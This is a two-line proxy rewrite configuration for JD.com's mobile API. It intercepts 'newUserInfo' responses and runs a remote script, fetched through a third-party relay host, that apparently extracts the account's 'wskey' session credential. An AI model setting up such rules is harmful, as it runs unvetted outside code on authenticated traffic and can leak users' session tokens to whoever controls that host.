hostname = api.m.jd.com

^https?:\/\/api\.m\.jd\.com\/client.action(.+)newUserInfo url script-response-bodyr https://js.iwocuole.xyz/https://raw.githubusercontent.com/a358594784/yuwen.github.io/main/ywwskey.js
